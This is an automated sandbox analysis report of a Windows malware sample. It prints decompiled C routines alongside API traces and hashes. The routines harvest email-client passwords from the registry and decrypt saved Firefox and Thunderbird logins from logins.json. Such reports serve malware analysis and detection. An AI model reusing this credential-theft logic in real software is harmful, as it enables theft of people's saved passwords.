                                                                    • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,745CE710,761F8250,00000000,?,02D1A25E), ref: 02D1A31C
                                                                    • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,745CE710,761F8250), ref: 02D1A363
                                                                    • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 02D1A3A7
                                                                    • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 02D1A3EB
                                                                    • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 02D1A42F
                                                                    • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 02D1A473
                                                                    • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 02D1A4E0
                                                                    • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 02D1A54D
                                                                    • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 02D1A5BA
                                                                      • Part of subcall function 02D1A632: GlobalAlloc.KERNEL32(00000040,-00000001,745CE730,?,?,?,02D1A5E6,00001000,?,00000000,00001000), ref: 02D1A650
                                                                      • Part of subcall function 02D1A632: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02D1A5E6), ref: 02D1A686
                                                                      • Part of subcall function 02D1A632: lstrcpyW.KERNEL32 ref: 02D1A6BD
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                                                    • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                                                    • API String ID: 6593746-2537589853
                                                                    • Opcode ID: 2da785869ca3415b65bcc50a56abf6f8d2efb90d5e077c2671c0a0d0343b2a05
                                                                    • Instruction ID: e8202bd3c3df347d7b10caf01884ceedb8ca0e5f7a45f60321bbf215065f5d2c
                                                                    • Opcode Fuzzy Hash: 2da785869ca3415b65bcc50a56abf6f8d2efb90d5e077c2671c0a0d0343b2a05
                                                                    • Instruction Fuzzy Hash: 69A1FEB2D10159BADB25EA90ED45FEE737DEF14744F1000A5F609F6280E674AF488FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E02D1AC0A(intOrPtr __ecx, void* __eflags, char _a4) {
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				WCHAR* _v20;
                                                                    				WCHAR* _v24;
                                                                    				char _v28;
                                                                    				intOrPtr _v32;
                                                                    				WCHAR* _v36;
                                                                    				char _v40;
                                                                    				char _v44;
                                                                    				int _v48;
                                                                    				int _v52;
                                                                    				int _v56;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				char _v68;
                                                                    				char _v72;
                                                                    				char _v76;
                                                                    				char _v80;
                                                                    				char _v84;
                                                                    				char _v88;
                                                                    				long _v92;
                                                                    				int _v96;
                                                                    				intOrPtr _v100;
                                                                    				char _v104;
                                                                    				char _v108;
                                                                    				char _v112;
                                                                    				void* _v116;
                                                                    				int _v120;
                                                                    				char _v124;
                                                                    				char _v128;
                                                                    				char _v132;
                                                                    				char _v136;
                                                                    				char _v140;
                                                                    				char _v144;
                                                                    				char _v148;
                                                                    				char _v152;
                                                                    				int _v156;
                                                                    				char _v160;
                                                                    				intOrPtr _v164;
                                                                    				char _v180;
                                                                    				char _v184;
                                                                    				short _v704;
                                                                    				short _v1224;
                                                                    				char* _t165;
                                                                    				void* _t167;
                                                                    				int _t189;
                                                                    				int _t190;
                                                                    				int _t193;
                                                                    				int _t207;
                                                                    				WCHAR* _t215;
                                                                    				void* _t217;
                                                                    				int _t221;
                                                                    				void* _t230;
                                                                    				void* _t236;
                                                                    				void* _t242;
                                                                    				int _t281;
                                                                    				int _t283;
                                                                    				char* _t293;
                                                                    				char* _t325;
                                                                    				void* _t386;
                                                                    				long _t389;
                                                                    				intOrPtr _t391;
                                                                    				intOrPtr _t392;
                                                                    				WCHAR* _t393;
                                                                    				int _t394;
                                                                    				void* _t395;
                                                                    				void* _t396;
                                                                    				void* _t397;
                                                                    
                                                                    				_t397 = __eflags;
                                                                    				_t392 = __ecx;
                                                                    				_v32 = __ecx;
                                                                    				E02D135E5( &_v24, L"Profile");
                                                                    				_t281 = 0;
                                                                    				E02D11052( &_v1224, 0, 0x208);
                                                                    				_t396 = _t395 + 0xc;
                                                                    				_v92 = 0;
                                                                    				_t389 = 0;
                                                                    				E02D11052( &_v704, 0, 0x104);
                                                                    				_t385 =  &_v704;
                                                                    				if(E02D1C118(L"firefox.exe",  &_v704, _t397) != 0) {
                                                                    					_t293 =  &_v44;
                                                                    					E02D135E5(_t293,  &_v704);
                                                                    					lstrcatW( &_v704, L"\\firefox.exe");
                                                                    					GetBinaryTypeW( &_v704,  &_v92);
                                                                    					_t399 = _v92 - 6;
                                                                    					_t165 =  &_v44;
                                                                    					if(_v92 != 6) {
                                                                    						_push(0);
                                                                    					} else {
                                                                    						_push(1);
                                                                    					}
                                                                    					_push(_t293);
                                                                    					E02D1362D(_t396, _t165);
                                                                    					_t167 = E02D1BA00(_t392, _t385, _t399);
                                                                    					_t400 = _t167;
                                                                    					if(_t167 != 0) {
                                                                    						E02D1346A( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
                                                                    						E02D1362D( &_v36,  &_a4);
                                                                    						E02D1346A( &_v36, _t385, _t400, L"profiles.ini");
                                                                    						E02D13437( &_v24, E02D135E5( &_v40, L"Profile"));
                                                                    						E02D15EA5(_v40);
                                                                    						E02D13272( &_v24, _t385, _t400, _t281);
                                                                    						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
                                                                    							_t389 = _t389 + 1;
                                                                    							_v40 = _t389;
                                                                    							E02D13437( &_v24, E02D135E5( &_v96, L"Profile"));
                                                                    							E02D15EA5(_v96);
                                                                    							_v96 = _t281;
                                                                    							E02D13272( &_v24, _t385, __eflags, _t389);
                                                                    							E02D1362D( &_v12,  &_a4);
                                                                    							E02D1346A( &_v12, _t385, __eflags,  &_v1224);
                                                                    							E02D13554( &_v12,  &_v28);
                                                                    							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
                                                                    							__eflags = _t189;
                                                                    							if(_t189 == 0) {
                                                                    								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
                                                                    								_v156 = _t190;
                                                                    								__eflags = _t190;
                                                                    								if(_t190 == 0) {
                                                                    									goto L7;
                                                                    								} else {
                                                                    									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
                                                                    									_t396 = _t396 + 0xc;
                                                                    									__eflags = _t193;
                                                                    									if(_t193 != 0) {
                                                                    										goto L7;
                                                                    									} else {
                                                                    										E02D1362D( &_v20,  &_v12);
                                                                    										E02D1346A( &_v20, _t385, __eflags, L"\\logins.json");
                                                                    										_t386 = 0x1a;
                                                                    										E02D1F76B( &_v16, _t386, __eflags);
                                                                    										E02D1346A( &_v16, _t386, __eflags, "\\");
                                                                    										_t385 = 8;
                                                                    										E02D13335( &_v16, __eflags, E02D134A7( &_v56, _t385, __eflags));
                                                                    										E02D15EA5(_v56);
                                                                    										_v56 = _t281;
                                                                    										E02D1346A( &_v16, _t385, __eflags, L".tmp");
                                                                    										_t393 = _v16;
                                                                    										_t390 = _v20;
                                                                    										__eflags = CopyFileW(_v20, _t393, _t281);
                                                                    										if(__eflags != 0) {
                                                                    											E02D13437( &_v20,  &_v16);
                                                                    											_t390 = _v20;
                                                                    										}
                                                                    										E02D1FECE( &_v184, __eflags);
                                                                    										_t325 =  &_v180;
                                                                    										E02D13437(_t325,  &_v20);
                                                                    										_push(_t325);
                                                                    										_t207 = E02D20192( &_v184, 0xc0000000);
                                                                    										_t327 =  &_v184;
                                                                    										__eflags = _t207;
                                                                    										if(__eflags != 0) {
                                                                    											_v52 = _t281;
                                                                    											_v48 = _t281;
                                                                    											E02D1FE3D( &_v184, _t385,  &_v52, _v164, _t281);
                                                                    											_t215 = E02D133BF( &_v116, "encryptedUsername");
                                                                    											_t217 = E02D12F22( &_v52,  &_v160);
                                                                    											_t385 = _t215;
                                                                    											_t283 = E02D19EB7(_t217, _t215, __eflags);
                                                                    											_v120 = _t283;
                                                                    											E02D15EA5(_v160);
                                                                    											_t336 = _v116;
                                                                    											E02D15EA5(_v116);
                                                                    											__eflags = _t283;
                                                                    											if(_t283 == 0) {
                                                                    												_t281 = 0;
                                                                    												__eflags = 0;
                                                                    											} else {
                                                                    												_t391 = _v32;
                                                                    												_t281 = 0;
                                                                    												__eflags = 0;
                                                                    												_t394 = _v120;
                                                                    												do {
                                                                    													_v112 = 0;
                                                                    													_v108 = 0;
                                                                    													_v104 = 0;
                                                                    													_t230 = E02D133BF( &_v128, "hostname");
                                                                    													E02D19EF0( &_v88, E02D12F22( &_v52,  &_v124), __eflags, _t230, _t394);
                                                                    													E02D15EA5(_v124);
                                                                    													E02D15EA5(_v128);
                                                                    													_t236 = E02D133BF( &_v136, "encryptedUsername");
                                                                    													E02D19EF0( &_v84, E02D12F22( &_v52,  &_v132), __eflags, _t236, _t394);
                                                                    													E02D15EA5(_v132);
                                                                    													E02D15EA5(_v136);
                                                                    													_t242 = E02D133BF( &_v144, "encryptedPassword");
                                                                    													_t385 = E02D12F22( &_v52,  &_v140);
                                                                    													E02D19EF0( &_v80, _t244, __eflags, _t242, _t394);
                                                                    													E02D15EA5(_v140);
                                                                    													E02D15EA5(_v144);
                                                                    													E02D1B15E(_t391, __eflags, _v84,  &_v72);
                                                                    													E02D1B15E(_t391, __eflags, _v80,  &_v76);
                                                                    													E02D13437( &_v112, E02D1309D( &_v88, __eflags,  &_v60));
                                                                    													E02D15EA5(_v60);
                                                                    													_v60 = 0;
                                                                    													E02D13437( &_v108, E02D1309D(E02D133BF( &_v148, _v72), __eflags,  &_v64));
                                                                    													E02D15EA5(_v64);
                                                                    													_v64 = 0;
                                                                    													E02D15EA5(_v148);
                                                                    													E02D13437( &_v104, E02D1309D(E02D133BF( &_v152, _v76), __eflags,  &_v68));
                                                                    													E02D15EA5(_v68);
                                                                    													_v68 = 0;
                                                                    													E02D15EA5(_v152);
                                                                    													_t396 = _t396 - 0x10;
                                                                    													_v100 = 0;
                                                                    													E02D11F95(_t396,  &_v112);
                                                                    													E02D11FCB(_t391);
                                                                    													E02D15EA5(_v72);
                                                                    													E02D15EA5(_v76);
                                                                    													E02D15EA5(_v80);
                                                                    													E02D15EA5(_v84);
                                                                    													E02D15EA5(_v88);
                                                                    													_t336 =  &_v112;
                                                                    													E02D113EF( &_v112);
                                                                    													_t394 = _t394 - 1;
                                                                    													__eflags = _t394;
                                                                    												} while (_t394 != 0);
                                                                    												_t393 = _v16;
                                                                    												_t390 = _v20;
                                                                    											}
                                                                    											_t221 = PathFileExistsW(_t393);
                                                                    											__eflags = _t221;
                                                                    											if(_t221 != 0) {
                                                                    												E02D1362D(_t396,  &_v16);
                                                                    												E02D1FF0B(_t336);
                                                                    											}
                                                                    											 *((intOrPtr*)(_v32 + 0x84))(_v156);
                                                                    											 *((intOrPtr*)(_v32 + 0x6c))();
                                                                    											E02D13036( &_v52);
                                                                    											_t327 =  &_v184;
                                                                    										}
                                                                    										E02D1FEED(_t327, __eflags);
                                                                    										E02D15EA5(_t393);
                                                                    										_v16 = _t281;
                                                                    										E02D15EA5(_t390);
                                                                    										_v20 = _t281;
                                                                    										E02D15EA5(_v28);
                                                                    										E02D15EA5(_v12);
                                                                    										_t389 = _v40;
                                                                    										_t392 = _v32;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								L7:
                                                                    								E02D15EA5(_v28);
                                                                    								E02D15EA5(_v12);
                                                                    							}
                                                                    							_v12 = _t281;
                                                                    						}
                                                                    						E02D1B9A9(_t392);
                                                                    						_t281 = 1;
                                                                    						E02D15EA5(_v36);
                                                                    					}
                                                                    					E02D15EA5(_v44);
                                                                    				}
                                                                    				E02D15EA5(_v24);
                                                                    				E02D15EA5(_a4);
                                                                    				return _t281;
                                                                    			}

                                                                    0x02d1ac0a
                                                                    0x02d1ac16
                                                                    0x02d1ac20
                                                                    0x02d1ac23
                                                                    0x02d1ac2d
                                                                    0x02d1ac37
                                                                    0x02d1ac3c
                                                                    0x02d1ac3f
                                                                    0x02d1ac48
                                                                    0x02d1ac51
                                                                    0x02d1ac58
                                                                    0x02d1ac6b
                                                                    0x02d1ac78
                                                                    0x02d1ac7b
                                                                    0x02d1ac8c
                                                                    0x02d1ac9d
                                                                    0x02d1aca3
                                                                    0x02d1aca7

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1C118: lstrcpyW.KERNEL32 ref: 02D1C154
                                                                      • Part of subcall function 02D1C118: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 02D1C162
                                                                      • Part of subcall function 02D1C118: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,02D1A729,?,00000104,00000000), ref: 02D1C17B
                                                                      • Part of subcall function 02D1C118: RegQueryValueExW.ADVAPI32(02D1A729,Path,00000000,?,?,?,?,00000104,00000000), ref: 02D1C198
                                                                      • Part of subcall function 02D1C118: RegCloseKey.ADVAPI32(02D1A729,?,00000104,00000000), ref: 02D1C1A1
                                                                    • lstrcatW.KERNEL32(?,\firefox.exe), ref: 02D1AC8C
                                                                    • GetBinaryTypeW.KERNEL32(?,?), ref: 02D1AC9D
                                                                    • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 02D1B11D
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13272: wsprintfW.USER32 ref: 02D1328D
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D13554: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,02D14E98,?), ref: 02D13581
                                                                      • Part of subcall function 02D13554: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D135AC
                                                                    • CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,02D24684,\logins.json,?), ref: 02D1AE14
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                                                    • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                                                    • API String ID: 288196626-815594582
                                                                    • Opcode ID: be9ca25e6f7d9818e6dd16babb42f6d23bed874c6b8c4658901ca506c0cf2583
                                                                    • Instruction ID: beaf31a5673e38540bd741e869ac8fbaaf016dab1054aa3138048636dbeb6cc1
                                                                    • Opcode Fuzzy Hash: be9ca25e6f7d9818e6dd16babb42f6d23bed874c6b8c4658901ca506c0cf2583
                                                                    • Instruction Fuzzy Hash: E0E1E9B1D00118ABDF19EBA0EC91DEEB77AEF54304F50406AA506A7B90DF356E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E02D1A6C8(intOrPtr __ecx, void* __eflags, char _a4) {
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				WCHAR* _v20;
                                                                    				WCHAR* _v24;
                                                                    				char _v28;
                                                                    				intOrPtr _v32;
                                                                    				char _v36;
                                                                    				char _v40;
                                                                    				char _v44;
                                                                    				int _v48;
                                                                    				int _v52;
                                                                    				long _v56;
                                                                    				int _v60;
                                                                    				int _v64;
                                                                    				char _v68;
                                                                    				char _v72;
                                                                    				char _v76;
                                                                    				char _v80;
                                                                    				char _v84;
                                                                    				intOrPtr _v88;
                                                                    				char _v92;
                                                                    				char _v96;
                                                                    				char _v100;
                                                                    				void* _v104;
                                                                    				int _v108;
                                                                    				char _v112;
                                                                    				char _v116;
                                                                    				char _v120;
                                                                    				char _v124;
                                                                    				char _v128;
                                                                    				char _v132;
                                                                    				char _v136;
                                                                    				char _v140;
                                                                    				char _v144;
                                                                    				char _v148;
                                                                    				int _v152;
                                                                    				long _v156;
                                                                    				char _v160;
                                                                    				intOrPtr _v164;
                                                                    				char _v180;
                                                                    				char _v184;
                                                                    				short _v704;
                                                                    				short _v1224;
                                                                    				long _t171;
                                                                    				int _t182;
                                                                    				int _t183;
                                                                    				int _t186;
                                                                    				int _t200;
                                                                    				WCHAR* _t208;
                                                                    				void* _t210;
                                                                    				int _t214;
                                                                    				void* _t223;
                                                                    				void* _t229;
                                                                    				void* _t235;
                                                                    				int _t279;
                                                                    				int _t281;
                                                                    				char* _t321;
                                                                    				void* _t382;
                                                                    				intOrPtr _t385;
                                                                    				intOrPtr _t387;
                                                                    				WCHAR* _t392;
                                                                    				int _t393;
                                                                    				void* _t394;
                                                                    				void* _t395;
                                                                    				void* _t396;
                                                                    
                                                                    				_t396 = __eflags;
                                                                    				_t385 = __ecx;
                                                                    				_v32 = __ecx;
                                                                    				E02D135E5( &_v24, L"Profile");
                                                                    				_t279 = 0;
                                                                    				E02D11052( &_v1224, 0, 0x208);
                                                                    				_v56 = 0;
                                                                    				_v156 = 0;
                                                                    				E02D11052( &_v704, 0, 0x104);
                                                                    				_t395 = _t394 + 0x14;
                                                                    				_t381 =  &_v704;
                                                                    				E02D1C118(L"thunderbird.exe",  &_v704, _t396);
                                                                    				E02D135E5( &_v44,  &_v704);
                                                                    				GetBinaryTypeW( &_v704,  &_v156);
                                                                    				E02D1362D(_t395,  &_v44);
                                                                    				_t289 = _t385;
                                                                    				if(E02D1B67E(_t385,  &_v704,  &_v44) != 0) {
                                                                    					L3:
                                                                    					E02D1346A( &_a4, _t381, __eflags, L"\\Thunderbird\\");
                                                                    					E02D1362D( &_v36,  &_a4);
                                                                    					E02D1346A( &_v36, _t381, __eflags, L"profiles.ini");
                                                                    					E02D13437( &_v24, E02D135E5( &_v40, L"Profile"));
                                                                    					E02D15EA5(_v40);
                                                                    					E02D13272( &_v24, _t381, __eflags, _t279);
                                                                    					_push(_v36);
                                                                    					_push(0x104);
                                                                    					while(1) {
                                                                    						_t389 = _v24;
                                                                    						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
                                                                    						__eflags = _t171;
                                                                    						if(_t171 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v56 = _v56 + 1;
                                                                    						E02D13437( &_v24, E02D135E5( &_v60, L"Profile"));
                                                                    						E02D15EA5(_v60);
                                                                    						_v60 = _t279;
                                                                    						E02D13272( &_v24, _t381, __eflags, _v56 + 1);
                                                                    						E02D1362D( &_v12,  &_a4);
                                                                    						E02D1346A( &_v12, _t381, __eflags,  &_v1224);
                                                                    						E02D13554( &_v12,  &_v28);
                                                                    						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
                                                                    						__eflags = _t182;
                                                                    						if(_t182 == 0) {
                                                                    							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
                                                                    							_v152 = _t183;
                                                                    							__eflags = _t183;
                                                                    							if(_t183 == 0) {
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
                                                                    								_t395 = _t395 + 0xc;
                                                                    								__eflags = _t186;
                                                                    								if(_t186 != 0) {
                                                                    									goto L5;
                                                                    								} else {
                                                                    									E02D1362D( &_v20,  &_v12);
                                                                    									E02D1346A( &_v20, _t381, __eflags, L"\\logins.json");
                                                                    									_t382 = 0x1a;
                                                                    									E02D1F76B( &_v16, _t382, __eflags);
                                                                    									E02D1346A( &_v16, _t382, __eflags, "\\");
                                                                    									_t381 = 8;
                                                                    									E02D13335( &_v16, __eflags, E02D134A7( &_v64, _t381, __eflags));
                                                                    									E02D15EA5(_v64);
                                                                    									_v64 = _t279;
                                                                    									E02D1346A( &_v16, _t381, __eflags, L".tmp");
                                                                    									_t392 = _v16;
                                                                    									_t386 = _v20;
                                                                    									__eflags = CopyFileW(_v20, _t392, _t279);
                                                                    									if(__eflags != 0) {
                                                                    										E02D13437( &_v20,  &_v16);
                                                                    										_t386 = _v20;
                                                                    									}
                                                                    									E02D1FECE( &_v184, __eflags);
                                                                    									_t321 =  &_v180;
                                                                    									E02D13437(_t321,  &_v20);
                                                                    									_push(_t321);
                                                                    									_t200 = E02D20192( &_v184, 0xc0000000);
                                                                    									_t323 =  &_v184;
                                                                    									__eflags = _t200;
                                                                    									if(__eflags != 0) {
                                                                    										_v52 = _t279;
                                                                    										_v48 = _t279;
                                                                    										E02D1FE3D( &_v184, _t381,  &_v52, _v164, _t279);
                                                                    										_t208 = E02D133BF( &_v104, "encryptedUsername");
                                                                    										_t210 = E02D12F22( &_v52,  &_v160);
                                                                    										_t381 = _t208;
                                                                    										_t281 = E02D19EB7(_t210, _t208, __eflags);
                                                                    										_v108 = _t281;
                                                                    										E02D15EA5(_v160);
                                                                    										_t332 = _v104;
                                                                    										E02D15EA5(_v104);
                                                                    										__eflags = _t281;
                                                                    										if(_t281 == 0) {
                                                                    											_t279 = 0;
                                                                    											__eflags = 0;
                                                                    										} else {
                                                                    											_t387 = _v32;
                                                                    											_t279 = 0;
                                                                    											__eflags = 0;
                                                                    											_t393 = _v108;
                                                                    											do {
                                                                    												_v100 = 0;
                                                                    												_v96 = 0;
                                                                    												_v92 = 0;
                                                                    												_t223 = E02D133BF( &_v116, "hostname");
                                                                    												E02D19EF0( &_v40, E02D12F22( &_v52,  &_v112), __eflags, _t223, _t393);
                                                                    												E02D15EA5(_v112);
                                                                    												E02D15EA5(_v116);
                                                                    												_t229 = E02D133BF( &_v124, "encryptedUsername");
                                                                    												E02D19EF0( &_v84, E02D12F22( &_v52,  &_v120), __eflags, _t229, _t393);
                                                                    												E02D15EA5(_v120);
                                                                    												E02D15EA5(_v124);
                                                                    												_t235 = E02D133BF( &_v132, "encryptedPassword");
                                                                    												_t381 = E02D12F22( &_v52,  &_v128);
                                                                    												E02D19EF0( &_v80, _t237, __eflags, _t235, _t393);
                                                                    												E02D15EA5(_v128);
                                                                    												E02D15EA5(_v132);
                                                                    												E02D1B15E(_t387, __eflags, _v84,  &_v136);
                                                                    												E02D1B15E(_t387, __eflags, _v80,  &_v144);
                                                                    												E02D13437( &_v100, E02D1309D( &_v40, __eflags,  &_v68));
                                                                    												E02D15EA5(_v68);
                                                                    												_v68 = 0;
                                                                    												E02D13437( &_v96, E02D1309D(E02D133BF( &_v140, _v136), __eflags,  &_v72));
                                                                    												E02D15EA5(_v72);
                                                                    												_v72 = 0;
                                                                    												E02D15EA5(_v140);
                                                                    												E02D13437( &_v92, E02D1309D(E02D133BF( &_v148, _v144), __eflags,  &_v76));
                                                                    												E02D15EA5(_v76);
                                                                    												_v76 = 0;
                                                                    												E02D15EA5(_v148);
                                                                    												_t395 = _t395 - 0x10;
                                                                    												_v88 = 4;
                                                                    												E02D11F95(_t395,  &_v100);
                                                                    												E02D11FCB(_t387);
                                                                    												E02D15EA5(_v80);
                                                                    												E02D15EA5(_v84);
                                                                    												E02D15EA5(_v40);
                                                                    												_t332 =  &_v100;
                                                                    												E02D113EF( &_v100);
                                                                    												_t393 = _t393 - 1;
                                                                    												__eflags = _t393;
                                                                    											} while (_t393 != 0);
                                                                    											_t392 = _v16;
                                                                    											_t386 = _v20;
                                                                    										}
                                                                    										_t214 = PathFileExistsW(_t392);
                                                                    										__eflags = _t214;
                                                                    										if(_t214 != 0) {
                                                                    											E02D1362D(_t395,  &_v16);
                                                                    											E02D1FF0B(_t332);
                                                                    										}
                                                                    										 *((intOrPtr*)(_v32 + 0x84))(_v152);
                                                                    										 *((intOrPtr*)(_v32 + 0x6c))();
                                                                    										E02D13036( &_v52);
                                                                    										_t323 =  &_v184;
                                                                    									}
                                                                    									E02D1FEED(_t323, __eflags);
                                                                    									E02D15EA5(_t392);
                                                                    									_v16 = _t279;
                                                                    									E02D15EA5(_t386);
                                                                    									_v20 = _t279;
                                                                    									E02D15EA5(_v28);
                                                                    									E02D15EA5(_v12);
                                                                    									_t385 = _v32;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							L5:
                                                                    							E02D15EA5(_v28);
                                                                    							E02D15EA5(_v12);
                                                                    						}
                                                                    						_push(_v36);
                                                                    						_v12 = _t279;
                                                                    						_push(0x104);
                                                                    					}
                                                                    					E02D1B627(_t385);
                                                                    					_t279 = 1;
                                                                    					__eflags = 1;
                                                                    					E02D15EA5(_v36);
                                                                    				} else {
                                                                    					E02D1362D(_t395,  &_v44);
                                                                    					if(E02D1B67E(_t385,  &_v704, _t289) != 0) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						_t389 = _v24;
                                                                    					}
                                                                    				}
                                                                    				E02D15EA5(_v44);
                                                                    				E02D15EA5(_t389);
                                                                    				E02D15EA5(_a4);
                                                                    				return _t279;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1C118: lstrcpyW.KERNEL32 ref: 02D1C154
                                                                      • Part of subcall function 02D1C118: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 02D1C162
                                                                      • Part of subcall function 02D1C118: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,02D1A729,?,00000104,00000000), ref: 02D1C17B
                                                                      • Part of subcall function 02D1C118: RegQueryValueExW.ADVAPI32(02D1A729,Path,00000000,?,?,?,?,00000104,00000000), ref: 02D1C198
                                                                      • Part of subcall function 02D1C118: RegCloseKey.ADVAPI32(02D1A729,?,00000104,00000000), ref: 02D1C1A1
                                                                    • GetBinaryTypeW.KERNEL32(?,?), ref: 02D1A747
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D1B67E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 02D1B6AC
                                                                      • Part of subcall function 02D1B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B6B5
                                                                      • Part of subcall function 02D1B67E: PathFileExistsW.SHLWAPI(02D1A760,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 02D1B7A3
                                                                    • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 02D1ABCA
                                                                      • Part of subcall function 02D1B67E: PathFileExistsW.SHLWAPI(02D1A760,.dll,?,02D1A760,?,00000104,00000000), ref: 02D1B7FF
